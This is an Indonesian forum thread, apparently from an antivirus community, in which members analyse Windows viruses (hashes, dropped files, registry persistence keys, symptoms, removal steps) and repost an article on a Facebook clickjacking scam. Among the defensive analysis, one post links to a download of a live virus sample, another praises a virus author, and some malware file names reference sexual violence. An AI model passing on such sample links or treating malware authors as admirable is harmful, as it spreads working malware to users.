(http://i28.tinypic.com/2vctauf.jpg)

=> Mendisable beberapa AV Local maupun Import,seperti :
• Ansav
• PCMAV
• NOD32
• Avast
• Dan Registry Editor
Disini Smadav tidak dihiraukan si empunya virus,tetapi kemarin dia pesan ke saya kalau virus ini akan mematikan Smadav :D.

=> Untuk membuat aksinya lebih sempurna,virus ini akan mengaktifkan dirinya di Startup.
(http://i28.tinypic.com/2zs61p3.jpg)
=>Di regestry,virus ini juga akan menanamkan dirinya dengan nama : Vir.32.dll.vbs

=> Title Internet Explorer akan dirubah menjadi  <<--Worm_ by Kefi And 9a Friends-->>"

=> Ternyata virus maker mempunyai tujuan yang sama dengan saya dan beberapa teman-teman saya di dunia underground atau bahasa kerennya “Hacker” seperti anak-anak YCL,Jasakom,DC,PHL dll. Si empunya virus juga ternyata ingin menghacunrkan MalingSial….wkwkwkwk. Virus akan melakukan ping ke http://malingsial.com,tapi apa ada ya web malingsial gitu ? Tanya sama diri sendiri aja ya…….

Bagaimana mencegahnya ?

Setiap korban yang mengalami seperti ini pasti akan berusaha untuk menghilangi virus ini dari komputernya.Bahkan tidak seditkit yang frustasi dan akhirnya gantung diri….eh salah……. Install ulang maksudnya.Tapi itu sangat merugikan jika memang itu pilihan banyak orang,maka saya mending beli computer baru lagi :D.
Sebenarnya sudah sangat mudah untuk membersihkan virus-virus seperti ini.Kenapa ? Sudah jelaslah kan sudah ada AV yang bias menditeksi ini.Disini saya hanya menggunakan 2 AV,satu Smadav dan satu lagi Avast.Tinggal scanning dengan Smadav maka Avast akan mengeksekusinya.Kerjasama yang sangat bagus.Tetapi Avast disini terlalu ganas,karena beberapa file/aplikasi akan dibabat habis.So,Be Carefull guys.

Detect by Smadav
(http://i32.tinypic.com/2evuv6g.jpg)

Detect By Avast
(http://i26.tinypic.com/2hd1ph0.jpg)

Bagi yang mau Virusnya,Download Disini. (http://jastisbago.blogspot.com/2010/07/virus-kefiuniquessvvariant-by-rch.html)

Special Thanks t0:
=> My God
=> Yogyacarderlink Crew (http://yogyacarderlink.web.id)
=> Smadav Crew (http://smadaver.com/index.php)
Judul: Re: Bedah Virus : gadis_ancol.exe
Ditulis oleh: Jastis pada Juli 17, 2010, 11:53:57 AM
File: gadis_ancol.exe
Size: 61440 Bytes
MD5: 6E5312BF72D004570F5568FBD1F1562C
Packer: File not found
File Properties: CompanyName     
FileDescription 
FileVersion      1.00
InternalName     smu_orgasme
LegalCopyright   
OriginalFilename smu_orgasme.exe
ProductName      Project1
ProductVersion   
Pemograman Visual Basic 6.0<span class="fullpost">         

Icon dari Virus :
(http://i28.tinypic.com/501p38.jpg])

Gejala-gejala yang ditimbulkan :

1.Pada waktu pertama kali virus ini dijalankan,maka di task manager langsung akan muncul processesnya yaitu gadis_ancol.exe,tetapi setelah computer restart processes ini akan berubah menjadi ABG.exe.Pastilah dengan cara ini si korban akan tertipu sedikit dengan ulah virus.
(http://i32.tinypic.com/2pt9kig.jpg])

2.Setiap kali computer startup,maka virus ini langsung aktif.Karena virus ini akan membuat file/registrynya di startup.
(http://i26.tinypic.com/dop5r7.jpg])
Bahkan ada tiga registry yang akan di buat oleh virus,yaitu :

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3ndhi
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
(http://i32.tinypic.com/6xxkpi.jpg])

3.Ada beberapa file yang akan dibuat oleh virus disetiap drive dan sepertinya virus induk adalah ABG.exe.

C:\WINDOWS\system32\ABG.exe
C:\WINDOWS\system32\mahasiswi_virgin.exe
C:\WINDOWS\system32\Gadis_cina_di_perkosa_dalam_toko.exe
C:\WINDOWS\system32\Smu_bandung_full.exe
C:\WINDOWS\system32\MAkkasar_darah_perawan.exe
C:\WINDOWS\Fonts\fonts\smu_negeri_1_hot.exe
C:\WINDOWS\Fonts\fonts\anak_smk_utama.exe
C:\WINDOWS\Fonts\fonts\perkosa_rame2.exe
C:\WINDOWS\system\rena_virgin.exe
C:\WINDOWS\system\rena_orgasme.exe
C:\WINDOWS\system\rena_orgasme_1.exe
C:\WINDOWS\anak_lampung.exe
C:\WINDOWS\perkosa_abg.exe
C:\WINDOWS\darmajaya_hot.exe
C:\WINDOWS\dosen_&_mahasiswi.exe
C:\WINDOWS\mahasiswi_ubl_virgin.exe
Seperti gambar dibawah ini :
(http://i29.tinypic.com/16jgd3q.jpg])
(http://i25.tinypic.com/oiubth.jpg])
(http://i26.tinypic.com/2regq2o.jpg])
(http://i32.tinypic.com/302ov9t.jpg])

Tapi virus ini sudah bisa diatasi oleh Avast Anti Virus :D
(http://i26.tinypic.com/2zgvn8h.jpg])
Smadav Detect :
(http://i31.tinypic.com/2vshh0g.jpg])

Sumber (http://jastisbago.blogspot.com/)
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: Deny MiniDwarf pada Juli 17, 2010, 02:57:59 PM
Great analisis sob..than infonya...(http://www.laymark.com/i/m/m087.gif) (http://www.laymark.com)
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: paladin pada Agustus 21, 2010, 04:31:15 PM
nice :-bd :-bd :-bd :-bd :-bd :-bd :-bd :-bd :-bd :-bd :-bd
Judul: Bedah Virus : Mengatasi Virus Shortcut
Ditulis oleh: Jastis pada Agustus 28, 2010, 10:21:35 AM

Apa yang anda pikirkan jika Flashdisk yang 4GB dengan data yang sangat banyak,mungkin saja ada video 3gp
atau sejenisnya dan tiba-tiba sudah tidak bisa dibuka.Yang ada malah
folder shortcutnya ? Mungkin anda kesal atau malah membuang Flashdisknya dan bisa juga memformat ulang
walaupun resikonya sangat besar alias tidak bisa lagi nonton video Ariel-Luna-Cut Tari.
Saya sangat terkejut dengan virus ini,karena dengan script yang sangat sederhana mampu membuat komputer
yang terinfeksi menjadi tempat neraka.Seperti komputer di Lab kampus saya,hampir semua komuternya terinfeksi virus ini.
Sungguh luar biasa bukan ? Kalau begitu saya harus bangga dengan virus makernya,bravo bro.....

Ini adalah sebagian dari varian virusnya yang berhasil saya dapatkan.
File   : hnjeow_dmp.exe_
MD5   :  570f5a5248b1825039d1de846e55ae96
Size   : 167938

Ascii Strings:
---------------------------------------------------------------------------
x.exe
RECYCLER
VS_VERSION_INFO   : VarFileInfo Translation
StringFileInfo   : 040904B0
ProductName   : cBFtgadz
FileVersion   : 1.35
ProductVersion   : 1.35
InternalName   : cBFtgadz
OriginalFilename: cBFtgadz.exe

Gejala :

1.Komputer menjadi lemot/sering hang.
2.Folder di Flashdisk akan berubah menjadi shortcut dimana jika dibuka tidak ada rekasi apa.
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/jastis1.jpg)
3.Di Flashdisk juga akan ada file-file aneh,seperti Password.txt,ert.dll,shortcut folder Music,Video dan juga x.exe dan
beberapa file virus dimana file ini tidak sama namanya disetiap komputer yang terinfeksi.
4.Di Task Manager akan kelihatan alg.exe menjadi 2,satu di Local Service (file bawaan system) dan satu di user aktif (palsu).
5.Account user aktif akan dihidden oleh virus,biasanya juga Document And Setting juga menjadi hidden.
6.Folder option > View > Hide extensions operating system Files (Recommended) akan selalu dicentang,walaupun sudah
dihilangkan tanda centangnya (Gambar).
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/jastis2.jpg)

Ciri-ciri Virus :

1.File induknya alg.exe dan yang ditanam di C:\Document And Setting\User Account (Tergantung user yang dugunakan).
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/jastis3.jpg)
2.FIle lainyan adalah x.exe dan ert.dll,dan beberapa file aplikasi lain yang akan dibuat oleh virus (Biasanya disertia PC/Laptop bisa berbeda-beda).
3.Besar File cuman 156 Kb type Application/.exe.

Cara Mengatasi :
1.Rubah extensi file alg.exe,voilek.exe,voilekx.exe,x.exe dan ert.dll ke extension txt.(gambar) ika file tidak kelihatan,maka
masuk ke Tools -> Folder Option -> View ->silahkan lepaskan tanda centang di Hide extensions operating system Files (Recommended),
Lakukan dengan cepat  :D(gambar)
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/jastis4.jpg)(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/jastis5.jpg)
2.Restart Komputer Anda.
3.Buka Task Manager,kill proses alg.exe dan voilek.exe ( dikomputer saya namanya itu dan account saya adalah Black Hat).
4.Hapus File-file tadi (alg.exe,voilek.exe,ert.dll,x.exe) juga folder shortcut yang di Flashdisk.
5.Restart komputernya....dan lihat apa yang akan terjadi..... ;)

Lalu bagaimana mengembalikan file-file di flashdisk yang tadi dihidden virus ?
Nah ini cukup menggunakan Smadav,file anda akan berfungsi seperti semula.

Keadaan flashdisk sebelim discanning Smadav :
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/smadav1.jpg)

Hasil scanning Smadav :
(http://i439.photobucket.com/albums/qq115/Ono_nihA/Virus/smadav2.jpg)

Untuk lebih lengkap silahakan baca disini (http://jastisbago.blogspot.com/2010/08/mengatasi-virus-shortcut-by-jastis.html)
Judul: Re: Bedah Virus : Mengatasi Virus Shortcut
Ditulis oleh: The Gugel pada Agustus 28, 2010, 12:32:13 PM
sekedar tambahan ajah.....
afaik, virus shortcut memanfaatkan celah keamanan shortcut handling remote code execution vulnerability-MS10-046

maka dari itu, segera Install security patch 'Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046'. Silakan download security patch tersebut di  http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
Judul: Re: Bedah Virus : Mengatasi Virus Shortcut
Ditulis oleh: Deny MiniDwarf pada September 02, 2010, 11:13:16 AM
Tambahan juga..avg internet security 9 udah detect nih virus dengan tipical back door..
nice info jas...:D
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: somersault11 pada September 03, 2010, 09:33:18 PM
Nah ini yg gw cari,, solusi tepat dan cepat,,
NICE POST GAN,,

 :-X :-X :-X :-X :-X :-X :-X

 :-bd :-bd :-bd :-bd :-bd :-bd
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: Yudh pada September 04, 2010, 12:43:34 PM
Sorry agak Out Of Topic sebentar....

bagaimana kalo dibikin Thread Virus Analyst. jadi, Team smadav membuat suatu analisa virus , seperti ciri virus tsb, akibat yg ditimbulkan, menyebar kemana/lewat apa, serta penanganannya...

kalo bisa yg dianalisa virus yg sedang menyebar2 nya dan agak unik..

mungkin dengan ini bisa membantu smadaver yg kebingungan mengatasi virus, juga sebagai sarana belajar bagi yg hoby menganalisa Virus..

Judul: Re: Bedah Virus : Mengatasi Virus Shortcut
Ditulis oleh: Jastis pada September 07, 2010, 12:13:34 PM
@Yudha

Ini sudah threadnya yakni Bedah Virus,disini bisa dishare cara menganalisis virus :)

@All

Virus Shortcut sudah bisa diatas oleh Morphost AV  ;)
[info dari Karta S]
Judul: Re: Bedah Virus : Mengatasi Virus Shortcut
Ditulis oleh: saga_tirta pada September 07, 2010, 01:03:40 PM
@Yudha

Ini sudah threadnya yakni Bedah Virus,disini bisa dishare cara menganalisis virus :)

@All

Virus Shortcut sudah bisa diatas oleh Morphost AV  ;)
[info dari Karta S]

wew mhorphost cpet amat y pgen pndah hati nie k mhorphost...... :-\ :-\ :-\ v msie bnun
Judul: nRAevVmgHawHzt
Ditulis oleh: krztna17 pada September 07, 2010, 01:16:58 PM
yD7Rfu  <a href="http://bvqdpprejsos.com/">bvqdpprejsos</a>, kbubzewsyevo (http://kbubzewsyevo.com/), [link=http://ecxjfruqiqkh.com/]ecxjfruqiqkh[/link], http://gumhrbtnsstk.com/
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: joecool87 pada September 25, 2010, 08:30:43 PM
dasar pnjahat..knp suka bgt pake 666,ga takut jadi pengikut iblis bneran dan masuk neraka????
Judul: Re: Bedah Virus : FLyff 666.dll.vbs
Ditulis oleh: Jastis pada September 28, 2010, 11:30:48 AM
dasar pnjahat..knp suka bgt pake 666,ga takut jadi pengikut iblis bneran dan masuk neraka????

Gak boleh komen seperti begitu......
Baca RUles Forum.
Judul: qqdqmJxQEEy
Ditulis oleh: uzopz pada Oktober 03, 2010, 08:00:04 AM
fxM1e2  <a href="http://zuwploaqewqe.com/">zuwploaqewqe</a>, sxkqypcowbzp (http://sxkqypcowbzp.com/), [link=http://cyvdxaqboxab.com/]cyvdxaqboxab[/link], http://uvuaeedbtjtc.com/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Jastis pada Oktober 08, 2010, 09:51:21 AM
@uzopz

wah disini temapt analisis virus bukan masalah hadware :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: MiloMen™ pada Oktober 08, 2010, 10:57:27 AM
dasar pnjahat..knp suka bgt pake 666,ga takut jadi pengikut iblis bneran dan masuk neraka????
Kenapa ? komputer Anda terinfeksi virus ya. :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: bonny pada Oktober 11, 2010, 01:40:54 AM
kk,, kalo kompi di restore pake system restore bisa gak tuh... pake akun lain,,??? ??? ???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada Oktober 11, 2010, 09:07:44 AM
kk,, kalo kompi di restore pake system restore bisa gak tuh... pake akun lain,,??? ??? ???
setau saya sih gak bisa..soalnya untuk merestore system komputer musti memiliki hak admin..kecuali seluruh user account yang dibuat dikomputer tersebut menggunakan hak admin semua..
CMIIW
Judul: Re: Bedah Virus Disini !
Ditulis oleh: bonny pada Oktober 14, 2010, 12:01:08 AM
nah..itu dia..tepat sekali dugaannya  :-X :-X :-X aku emang admin skaligus user  :D :D waktu itu sengaja iseng2...tapi akhirnya dapat manfaatnya,,kan ada tu di tab toolnya smadav ku svchost.exe risk level ampe 9 danger virus..jadi langsung ku kill semua prosesnya...(maklum gak tau apa2 masih newbie) nah habis itu...jreeng..laptop jadi kacau.,,buka APAPUN gak bisa. :'( :'( :'( .hampir nangis tuh, langsung matikan secara paksa trus nyalain lagi, masuk di user account dari situ saya akses system restore trus kmbalikan lagi..pas selesai masuk lagi di admind,,bisa deh hufftt...lega ;D ;D ;D ;D

kenapa ya  ??? ??? svchost ntu apaan sih,,???  ??? ??? bukan virus yang jelas kan..??  ???

mohon pencerahannya biar kejadian serupa tidak terulang lagi...  ^:)^ ^:)^ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: CycLopz pada Oktober 14, 2010, 08:16:21 AM
om note book saya terjangkit virus nich ..!'

akibatnya TaskMag disable .!'

n' smua reg pda rusak ..!'

virus in suka berubah2 nama nya ..!'

langsung kena autorun.inf di C maupun D ..!'

tolongin saya dunk  ^:)^
Judul: Tolong...
Ditulis oleh: deandra pada Oktober 14, 2010, 10:25:52 AM
Saat masuk win (XP 3) , langsung masuk aplikasi search, dan dilakukan beruntun, sehingga sulit menjalankan aplikasi lainnya. Trus bila menekan tombol delete, itu juga akan dilakukan beruntun.  Ini kena virus apa bukan ??? Kalo iya, ada solusinya ga ??
Dah discan pake smadav versi 8.3. Pemberitahuan dari smadav 1 file registry yang kena di My Computer\HKEY_Current_User\Software\Microsoft\Windows\Currentversion\Policies\Explorer   dah di fix, tapi tetap aja aplikasi search nya jalan berulang-ulang.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: The Gugel pada Oktober 14, 2010, 10:32:57 AM
om note book saya terjangkit virus nich ..!'

akibatnya TaskMag disable .!'

n' smua reg pda rusak ..!'

virus in suka berubah2 nama nya ..!'

langsung kena autorun.inf di C maupun D ..!'

tolongin saya dunk  ^:)^

sample tsb sudah bisa di diteksi oleh ESET Smart Security bro...
Judul: Re: Tolong...
Ditulis oleh: The Gugel pada Oktober 14, 2010, 10:35:51 AM
Saat masuk win (XP 3) , langsung masuk aplikasi search, dan dilakukan beruntun, sehingga sulit menjalankan aplikasi lainnya. Trus bila menekan tombol delete, itu juga akan dilakukan beruntun.  Ini kena virus apa bukan ??? Kalo iya, ada solusinya ga ??
Dah discan pake smadav versi 8.3. Pemberitahuan dari smadav 1 file registry yang kena di My Computer\HKEY_Current_User\Software\Microsoft\Windows\Currentversion\Policies\Explorer   dah di fix, tapi tetap aja aplikasi search nya jalan berulang-ulang.
berarti file induknya msh berjalan bro...
coba full scan dgn MBAM (http://www.malwarebytes.org/mbam.php) (File Size: 5.86 MB)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada Oktober 17, 2010, 10:48:25 AM
nah..itu dia..tepat sekali dugaannya  :-X :-X :-X aku emang admin skaligus user  :D :D waktu itu sengaja iseng2...tapi akhirnya dapat manfaatnya,,kan ada tu di tab toolnya smadav ku svchost.exe risk level ampe 9 danger virus..jadi langsung ku kill semua prosesnya...(maklum gak tau apa2 masih newbie) nah habis itu...jreeng..laptop jadi kacau.,,buka APAPUN gak bisa. :'( :'( :'( .hampir nangis tuh, langsung matikan secara paksa trus nyalain lagi, masuk di user account dari situ saya akses system restore trus kmbalikan lagi..pas selesai masuk lagi di admind,,bisa deh hufftt...lega ;D ;D ;D ;D

kenapa ya  ??? ??? svchost ntu apaan sih,,???  ??? ??? bukan virus yang jelas kan..??  ???

mohon pencerahannya biar kejadian serupa tidak terulang lagi...  ^:)^ ^:)^ ^:)^
Gini bon..tab tool smadav tuh cuma membrikan hasil "dugaan"..bukan berarti risk yang tinggi itu virus..sebagai ontoh, coba instal yahoo widget di kompie kamu..dijamin ma smadav di kenakan risk ampe 4 (danger)..tapi tuh progie bukan virus kan?
untuk lebih amannya..instal juga av luar sebagai benhteng pertahanan utama dan smadav sebagai beckingnya...:D
Oh iya..admin disini maksudnya account yang kamu buat buka di account guest...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: hatjulhasbi pada Oktober 17, 2010, 10:58:43 AM
Cmd aja di duga virus ama smadav
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada Oktober 17, 2010, 11:04:31 AM
Cmd aja di duga virus ama smadav
nah yang ini lum pernah ketemu ma dwarf..minta SSnya donk...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: hatjulhasbi pada Oktober 17, 2010, 11:08:26 AM
Ternyata untk smadav rev 8.3.4 udah gk diangGap virus lgI, yg rev 8.1 kemaren di curigai virus ama smadav di (tools-> one virvs by user)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: dony_6676 pada Oktober 20, 2010, 11:53:28 PM
nice infonya,, :x
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Jastis pada Oktober 22, 2010, 10:39:22 AM
Cmd aja di duga virus ama smadav

wow....ss plis
Judul: Re: Bedah Virus Disini !
Ditulis oleh: waluyo07 pada Oktober 26, 2010, 05:02:23 AM
gak mungkin..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Metamorphic pada Oktober 26, 2010, 07:31:50 PM
Ternyata untk smadav rev 8.3.4 udah gk diangGap virus lgI, yg rev 8.1 kemaren di curigai virus ama smadav di (tools-> one virvs by user)

kok bisa?  ???
Judul: Re: Bedah Virus Disini ! "Lindsey Lohan SexVideo"
Ditulis oleh: Jastis pada November 03, 2010, 10:47:07 PM
Dapat pesan dari om Alfon di FB kemarin,langsung post disini ya...biar para Smadaver dapat mencegah dan mengatasi nih Virus :)
   Lindsey Lohan SexVideo  2 November 2010
McDonalds Facebook exploit part 2

Jika ditanyakan, situs apa yang paling banyak di akses di internet, dapat dipastikan salah satunya adalah situs Sex, salah satu buktinya adalah domain sex.com yang sudah ditawar US $ 13 juta atau 117 milyar rupiah. Selain sex, hal lain yang paling menarik perhatian para pengakses internet adalah pesohor alias selibritis. Bagaimana kalau dua hal tersebut digabungkan dan digunakan untuk menyebarkan kode jahat ? Dan sarana yang digunakan adalah jejaring sosial yang paling top di dunia saat ini dengan anggota lebih dari 500 juta orang. Yang jelas akan banyak korban yang terkena dampaknya, dari yang kelihatannya alim-alim saja sampai yang bandel sekalipun akan menjadi korban eksploitasi ini.

Rupanya setelah menggunakan video pengetesan kentang McDonalds yang setelah berminggu2 di biarkan di dalam toples tidak mengalami kerusakan dan memakan korban cukup banyak, khususnya para facebooker yang perduli dengan kesehatan badan (raga) nya. Kini pengeksploitasi celah keamanan yang sama tidak lagi mengincar kalangan yang peduli dengan kesehatan raga, tetapi kini korban yang di incar sekarang adalah yang peduli dengan kesehatan jiwanya, alias penggemar film dewasa (porno). Tidak tanggung-tanggung, pesohor yang dipakai adalah Lindsay Lohan yang memang terkenal kelakuannya agak-agak minus tetapi tetap saja banyak yang suka dan menjadi korbannya.

Metode yang dipakai sama persis dengan video McDonalds, hanya saja kalau video McDonalds bisa di tonton oleh siapapun, alias semua umur. Maka video yang satu ini jelas-jelas tidak bisa di tonton oleh semua kalangan, sekalipun sudah ditemani orang tuanya PG-13, tetap tidak disarankan menonton video ini karena memang kategorinya termasuk film porno (Adult).

Adapun pesan yang akan datang sebagai “Event Invitation” dari Facebook akan datang dengan berbagai macam judul seperti : (lihat gambar 1)
    * Lindsey Having Sex with HOT Girl
    *This is Lindsey Lohan's Leaked Celebrity Sex Tape
    *Lindsey Lohan Celebrity Sex Tape
    *This is Lindsey Lohan's Leaked Sex Video
    *Lindsay Lohan Just Leaked Sex Tape
    *Lindsay Lohan Having a THREEWAY on Camera

(http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video_html_m64e08ac2.jpg)
Gambar 1, Event Invitation yang melakukan eksploitasi aplikasi Facebook


Sama dengan eksploitasi menggunakan thema McDonalds http://vaksin.com/2010/1010/mcdonalds%20food/mcdonalds%20food.htm mengklik event [Yes] [No] atau [Maybe] tidak akan mengakibatkan anda menjadi korban eksploitasi dan “hanya” memunculkan nama kontak anda di dalam daftar aplikasi. Tetapi hebatnya, malah banyak pengguna Facebook yang menyukai aplikasi jahat ini, entah sadar atau tidak sadar mengklik “like”. (lihat gambar 2)

(http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video_html_7107effd.jpg)
Gambar 2, Aplikasi HD Video yang tanpa disadari melakukan posting Event Invitation berisi link video porno Lindsay Lohan malah banyak disukai pengguna Facebook.

Cara kerja eksploitasi

Karena yang di eksploitasi adalah apps di Facebook, maka tentunya tidak ada pengaruh Operating System apa yang anda gunakan. Asalkan anda menyetujui aplikasi jahat tersebut di Facebook, maka langsung akun Facebook anda akan terinfeksi dan menjadi korban. Dan salah satu akibat yang ditimbulkan adalah Event Invitation tersebut akan muncul di profile korbannya (lihat gambar 3). Jadi bisa anda bayangkan kalau anak anda yang masih SD memiliki akun Facebook dan dengan rasa ingin tahu yang besar mengklik link yang diberikan. Selain mendapatkan suguhan konten porno, profile Facebooknya pun akan dipenuhi dengan undangan untuk menyaksikan konten porno tersebut. Seakan tidak cukup mempermalukan korbannya, semua kontak Facebook yang menjadi korban akan dikirimi Event Invitation dengan isi konten porno tersebut.

(http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video_html_m4dd11250.jpg)
Gambar 3, Akun Facebook korban eksploitasi ini akan menampilkan segambreng undangan menyaksikan aktivitas (event invitation).


Bagaimana caranya akun Facebook anda bisa menjadi korban dan bagaimana menghindarinya ?

Pembuat aplikasi jahat ini sangat cerdik, ibarat umpan kecil mendapat ikan kecil dan umpan besar mendapatkan ikan lebih besar. Kalau kemarin dengan umpan video McDonalds berpengawet hanya mendapatkan korban yang sedikit. Maka kali ini dengan umpan Lindsay Lohan korbannya akan lebih banyak dan selain itu tentunya menjadi malu. Jika anda membaca judul pengantar, dibuat dengan cukup provokatif dan menimbulkan rasa penasaran untuk mengklik seperti (jangankan judul yang sangat provokatif seperti di bawah ini, pada banyak kasus, tulisan “Don't Click” saja terkadang malah di klik :p) :

    *Guys .... don't ask me how I found this. ***** CLICK THIS LINK BELOW TO VIEW THE VIDEO ***** ------>http://tinyurl.com/.....<------
    *Don't ask me how I found this video. ***** CLICK THIS LINK BELOW TO VIEW THE VIDEO ***** ------>http://tinyurl.com/.....<------
    *Do not ask how I have this video. ***** CLICK THIS LINK BELOW TO VIEW THE VIDEO ***** ------>http://tinyurl.com/.....<------

Jika anda mengklik link Tiny URL yang diberikan, anda akan dibawa ke situs aplikasi Facebook dengan tampilan yang sangat “menjanjikan” bahwa anda hanya dapat melihat video tersebut jika sudah menginstal plugin yang dibutuhkan. (lihat gambar 4)

(http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video_html_74f92478.jpg)
Gambar 4, Anda dipaksa menginstal plugin jika ingin melihat video porno Lindsay Lohan

Bagaimana korbannya tidak tergiur. Sudah bisa lihat aktivitas pribadi Lindsay Lohan, gratis lagi. Syaratnya cuma instal plugin. Dapat dipastikan penerima link ini ibarat kerbau dicocok hidung akan langsung bilang okelah kalau beg beg begitu dan setuju menginstal plugin yang diminta (lihat gambar 5).
(http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video_html_6fc80eec.jpg)
Gambar 5, Jika anda setuju dan mengklik [Allow] maka anda akan diperbolehkan melihat video tersebut sekaligus seluruh kontak anda akan dikirimi Event Invitation melihat video ini.

Setelah anda mengklik allow untuk menginstal plugin ini, anda akan mendapatkan akses mendowload dan melihat video dewasa ini. Sama seperti pada kasus McDonalds, video dewasa ini diambil dari situs dewasa www.ibangpornsta*.com.

Bagaimana mencegah menjadi korban

Kenyamanan selalu berbanding terbalik dengan sekuriti. Kalau anda mau aman, maka harus sedikit repot / tidak nyaman. Dan pihak Facebook sebenarnya sudah sangat proaktif menghapus aplikasi-aplikasi jahat yang dilaporkan. Tetapi yang menjadi masalahnya adalah ibarat membuat SPAM, eksploitasi Event Invitation ini dilakukan dengan mengganti nama aplikasi (apps Facebook). Menurut catatan Vaksincom, nama yang sering dipakai adalah nama-nama yang behubungan dengan Video HD seperti : hdvidplugin, hdvideoplayer atau hd-video-now. Adalah sangat sulit dan memakan sumber daya dan waktu yang besar (utnuk tidak mengatakan mustahil) bagi admin Facebook mengetes setiap aplikasi yang dibuat dan menghentikannya jika terbukti jahat. Karena itu, kelihatannya Facebook menggunakan metode meloloskan terlebih dahulu aplikasi yang dibuat dan kalau terbukti jahat (ada laporan) baru langsung di nonaktifkan.

Tetapi sebenarnya kunci pengamanan sudah dilakukan oleh Facebook dan diserahkan ke tangan pengguna Facebook (anda). Berapapun Event Invitation yang dikirimkan kepada anda, jika anda tidak pernah memberikan izin [Allow] aplikasi Facebook yang jahat tersebut, akun Facebook anda akan selalu aman dan tidak akan menjadi korban eksploitasi. Karena itu, saran Vaksincom, JANGAN PERNAH [Allow] aplikasi Facebook yang anda tidak ketahui. Kalau anda ragu terhadap satu aplikasi, sebaiknya jangan di [Allow].

Bagaimana jika sudah menjadi korban

Sama seperti eksploitasi McDonalds, cara mengatasi aplikasi yang mengeksploitasi adalah dengan menghapus aplikasi tersebut. Untuk detailnya lihat di http://vaksin.com/2010/1010/mcdonalds%20food/mcdonalds%20food.htm.

Sumber : Vaksin[dot]com (http://vaksin.com/2010/1110/lindsay%20lohan/lindsay%20lohan%20sex%20video.html)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: tembagakuningan pada November 03, 2010, 10:53:41 PM
nice post
kerajinan lampu (http://tembagakuningan.com/kerajinan-lampu-gantung.php)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: denio pada November 15, 2010, 08:16:28 PM
 :-bdmakasih atas infonya sangat membantu tapi  aku ada masalah nih dengan.virus yang satu ini.
 virus ini berada di bawah local disk .C.dan tak terlihat apa bila kita buka folder .c. nya
tapi kalau kita buka di smadav saat kita mau scan persis dibawah local disk C dia terlihat berupa <file>
cuma tak bisa kedetek ama smadav. persis seperti. heur .jklf .exe.yang telah saya upload kemarin yang sudah level 9 dan tak bisa di hapus.bentuknya  sama   heur .jklf .exe   sangat mencurigakan .
tolong dong bantuin virus ini namanya apa dan bagaimana cara mengatasinya .makasih ya? atas infonya
semoga smadav kedepannya bisa dijadikan anti virus yg sangat berguna di indonesia.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: aciid pada November 19, 2010, 02:17:35 PM
wah tantangan tuh kk kk smadav
kmi tunggu ya  :-X
Judul: Re: Bedah Virus Disini !
Ditulis oleh: teguh212 pada November 21, 2010, 12:19:38 PM
 :) ..........moon bantuannya ada virus di game online poin blank......<HKEY_LOKAL_MACHINE\SOFTWARE\MICROSOFT\COMMAND PROCESSOR>nama virus autorun...................di game online pooint blank???????????
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada November 24, 2010, 09:57:01 AM
HAi    hehehe g tw mw posting dmna tp cm mw nanya nih y... ^:)^ ^:)^ ^:)^
oiya kalian tw TTg virus shorcut ato exploit . :-\ :-\....hahhah pasti tw kan....

 :D :D
nah Kalian jg tw kan ttg Virus stuxnet....... :D

...yah yg mmbuat isi hardisk sampe penuh....

nah yg jadi pertanyaan .... :)
stiap Kali saya mnmukan Virus shortcut dbbrpa Flashdisk ....

saya jg sllu mnmukan

stuxnet
Trojan “Stuxnet” memanfaatkan dengan baik penggunaan usb atau pun share jaringan yang full akses. Trojan akan melakukan infeksi komputer secara otomatis, karena dengan membuat 2 file yang akan ter-eksekusi dengan baik yaitu :

Ø   ~WTR[angka_acak].tmp

Ø  ~WTR[angka_acak].tmp

hehe copy dr vaksin.com maaf y :D :D :D

nah tuh slah satu mtode pnyebaranx.... :D

stiap ada virus shortcut sya jg mnmukan stuxnet ddlamx ... :-\

nah yg dtanyakan apakah virus shortcut jg mnggbungkan diri brsma dgn stuxnet...??? ??? ???

krn ada virus shortcut sllu ada stuxnet......itu yg saya tmukan... \m/ ~x(

oh iya smadav BLm mndetek ttg stuxnet ini loh... :P :-\

hmm nti kpn2 saya upload lo ktmu samplex..... :D :D :D


